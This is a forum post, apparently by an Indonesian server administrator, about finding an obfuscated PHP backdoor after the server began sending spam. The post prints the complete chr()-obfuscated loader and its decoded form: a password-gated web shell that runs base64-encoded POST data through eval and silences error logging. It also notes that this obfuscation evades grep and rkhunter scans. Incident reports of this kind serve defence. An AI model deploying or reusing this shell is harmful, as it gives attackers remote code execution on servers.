Ketemu backdoor baru


Status
Not open for further replies.
Abang Noob

Abang Noob

Poster 2.0
Halo semua, mungkin ini sudah lama. cuma kalo saya pribadi baru kali ini mendapati backdoor seperti ini.

Jadi pagi tadi dapet notifikasi dari mxtoolbox bahwa ip saya kena blacklist (cuma 1 tools yang memblacklist "Protected Sky").

dari notifikasi tsb saya jadi mencek email yang keluar dari server. saya mendapati sebuah akun yang mengirimkan > 170 email/jam, untungnya di server saya sudah set hanya bisa mengirimkan 25 email/jam lebih dari itu email otomatis didrop.

lalu saya mendapati file .php yg mencurigakan di folder public_html, isinya:
Code: 
<?php                                                                                                                                                                                                                                                                                                                         $z272Cg5=chr(112).chr(114)."e".chr(103)."_repl".chr(97)."c".chr(101);$s4U3o6c="e".chr(118)."al(ba".chr(115).chr(101)."64_d".chr(101).chr(99)."ode("QGV".chr(121).chr(99)."m".chr(57).chr(121).chr(88)."3JlcG9ydGluZy".chr(103)."wK".chr(84).chr(115)."NC".chr(107).chr(66)."pbml".chr(102)."c2".chr(86).chr(48)."KCJka".chr(88)."NwbGF5X2Vyc".chr(109)."9".chr(121)."c".chr(121)."I".chr(115)."M".chr(67)."k7DQpA".chr(97).chr(87).chr(53)."pX".chr(51)."NldCgibG9n".chr(88).chr(50)."V".chr(121).chr(99)."m".chr(57)."ycy".chr(73).chr(115)."MCk".chr(55).chr(68)."Qp".chr(65)."a".chr(87)."5p".chr(88)."3".chr(78)."ldCgiZX".chr(74).chr(121).chr(98)."3".chr(74).chr(102)."bG9".chr(110).chr(73)."i".chr(119).chr(119)."KTsNCg0".chr(75).chr(97)."WY".chr(103)."KGl".chr(122)."c".chr(50).chr(86)."0K".chr(67)."RfUE".chr(57)."TVC".chr(107)."g".chr(74).chr(105).chr(89)."gaXNfYXJ".chr(121)."YX".chr(107)."o".chr(74)."F9".chr(81)."T1".chr(78)."U".chr(75).chr(83)."AmJiBjb3VudC".chr(103)."kX1BPU".chr(49)."QpPjE".chr(112).chr(68)."Q".chr(112)."7DQo".chr(74)."Zm9yZWFjaCAoJ".chr(70).chr(57).chr(81)."T1NUI".chr(71)."F".chr(122).chr(73).chr(67)."R".chr(50).chr(89)."XI".chr(112)."DQoJew".chr(48)."KCQ".chr(108).chr(112)."ZiA".chr(111)."I".chr(87)."lzc2V0KCRjb2RlKSkgJGN".chr(118)."ZGUgPSA".chr(107)."dmF".chr(121)."Ow".chr(48)."KCQllbH".chr(78).chr(108).chr(97)."WYg".chr(75).chr(67)."Fpc3NldCgkcGFz".chr(99)."ykpI".chr(67)."R".chr(119)."Y".chr(88)."NzID0g".chr(74).chr(72)."Z".chr(104)."c".chr(106).chr(115)."N".chr(67)."gk".chr(74)."Z".chr(87)."x".chr(122)."ZSBicmVh".chr(97)."zsNC".chr(103).chr(108)."9DQ".chr(111)."NCgl".chr(112)."ZiAoJHBhc3M".chr(103)."P".chr(84)."0gIl".chr(81)."1".chr(83)."0p".chr(79).chr(100).chr(107)."N".chr(70)."cThS".chr(77).chr(72)."B3d".chr(107)."MzYz".chr(70)."X".chr(86)."GVZ".chr(97)."3B1R".chr(109)."dQW".chr(84)."N2".chr(73).chr(105)."kNC".chr(103).chr(108)."7".chr(68).chr(81)."oJ".chr(67)."WV".chr(50)."YWw".chr(111).chr(89)."mFzZT".chr(89)."0".chr(88).chr(50)."RlY".chr(50).chr(57).chr(107)."ZSgkY".chr(50).chr(57)."kZSkp".chr(79).chr(119)."0KC".chr(88)."0".chr(78).chr(67)."n".chr(48).chr(78).chr(67)."m".chr(86)."4a".chr(88).chr(81)."7")".chr(41).";";$g66kwdn="/91e".chr(54)."5c53".chr(56)."9d29b6b".chr(101)."ec20e179f".chr(98)."8bf4".chr(101)."/e";$z272Cg5($g66kwdn,$s4U3o6c,chr(57).chr(49).chr(101).chr(54)."5c53".chr(56)."9d".chr(50).chr(57)."b6".chr(98).chr(101)."ec".chr(50)."0e".chr(49).chr(55)."9".chr(102).chr(98).chr(56)."bf4".chr(101));?>

saat saya decrypt base64 ternyata tidak bisa, akhirnya saya coba buat script untuk mengubah fungsi chr() ke nilai yg sesuai, sehingga mendapati:

Code: 
<?php                                                                                                                                                                                                                                                                                                                         $z272Cg5=preg_replace;$s4U3o6c=eval(base64_decode(QGVycm9yX3JlcG9ydGluZygwKTsNCkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMCk7DQpAaW5pX3NldCgibG9nX2Vycm9ycyIsMCk7DQpAaW5pX3NldCgiZXJyb3JfbG9nIiwwKTsNCg0KaWYgKGlzc2V0KCRfUE9TVCkgJiYgaXNfYXJyYXkoJF9QT1NUKSAmJiBjb3VudCgkX1BPU1QpPjEpDQp7DQoJZm9yZWFjaCAoJF9QT1NUIGFzICR2YXIpDQoJew0KCQlpZiAoIWlzc2V0KCRjb2RlKSkgJGNvZGUgPSAkdmFyOw0KCQllbHNlaWYgKCFpc3NldCgkcGFzcykpICRwYXNzID0gJHZhcjsNCgkJZWxzZSBicmVhazsNCgl9DQoNCglpZiAoJHBhc3MgPT0gIlQ1S0pOdkNFcThSMHB3dkMzYzFXVGVZa3B1RmdQWTN2IikNCgl7DQoJCWV2YWwoYmFzZTY0X2RlY29kZSgkY29kZSkpOw0KCX0NCn0NCmV4aXQ7));;$g66kwdn=/91e65c5389d29b6beec20e179fb8bf4e/e;$z272Cg5($g66kwdn,$s4U3o6c,91e65c5389d29b6beec20e179fb8bf4e);?>

saat saya decypt via https://www.tools4noobs.com/online_php_functions/base64_decode/
jadinya seperti ini:

Code: 
ÿúaÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿóÛ½‚ƒÿÿÿêeÿÿÿþÎގœëÚÿöÚ±î¸ýלÿÿÿ@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);

if (isset($_POST) && is_array($_POST) && count($_POST)>1)
{
    foreach ($_POST as $var)
    {
        if (!isset($code)) $code = $var;
        elseif (!isset($pass)) $pass = $var;
        else break;
    }

    if ($pass == "T5KJNvCEq8R0pwvC3c1WTeYkpuFgPY3v")
    {
        eval(base64_decode($code));
    }
}
exit;ÿÿÿþº“gÿu{®\ç=wo[鷞sm׿_oÆßáïÞÿüöï` ÿÿàë©0ÿÿÿ³…7ÿÿÿ÷WºåÎwó×võ¾›yç6Ñí{õöümþÿÿÿ

mungkin ada teman-teman yg bisa mengartikan atau punya metode lain agar bisa mengetahui apa tujuan file .php tsb.

yang jelas dengan penyerang membuat memakai chr(), maka cara scan memakai:
grep -r "base64_decode" tidak akan bisa mendapati berkas yang mencurigakan di server. saya juga sudah coba rkhunter ternyata tetap tidak bisa mendeteksi.

sekian share dari saya, monggo silakan berdiskusi dan memberikan masukan untuk kemajuan kita bersama.
 
Status
Not open for further replies.

Top